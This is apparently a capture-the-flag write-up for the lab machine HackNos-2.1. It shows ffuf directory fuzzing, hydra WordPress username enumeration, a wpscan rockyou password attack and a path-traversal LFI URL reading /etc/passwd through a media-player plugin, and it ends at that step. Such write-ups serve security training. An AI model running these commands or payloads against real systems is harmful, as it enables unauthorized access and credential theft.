Last updated: 15 Apr 24 09:30:49 (UTC)

Write-Up HackNos-2.1

HackNos-2.1

By Lawcky 02/01/2024

Introduction

Flag : 2 Flag first user And second root

Learning : Web Application | Enumeration | Password Cracking

Difficulty : Easy-Medium

Additionnal info :

Name: hackNos: Os-hackNos-2.1
Release date: 29 Nov 2019
Author: Rahul Gehlaut
Series: hackNos

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

Write-UP

Fuzzing the site

sudo ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.58/FUZZ -fc 403

done also with “.txt” “.html” and “.FUZZ”

found tsweb nikto scan ==> here

fuzzing it

Attacking wordpress

User Enumeration

hydra -L /usr/share/SecLists/Usernames/cirt-default-usernames.txt -p password -u 192.168.1.58 http-form-post '/tsweb/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.58%2Ftsweb%2Fwp-admin%2F&testcookie=1:F=Unknown username.'

emails are false positive, but the user is true

we run a password attack while searching for other ways

Password attack

sudo wpscan --url http://192.168.1.58/tsweb/wp-login.php --password-attack wp-login -U user -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt

Getting in

The media player we found in scans is vulnerable to LFI

http://192.168.1.58/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd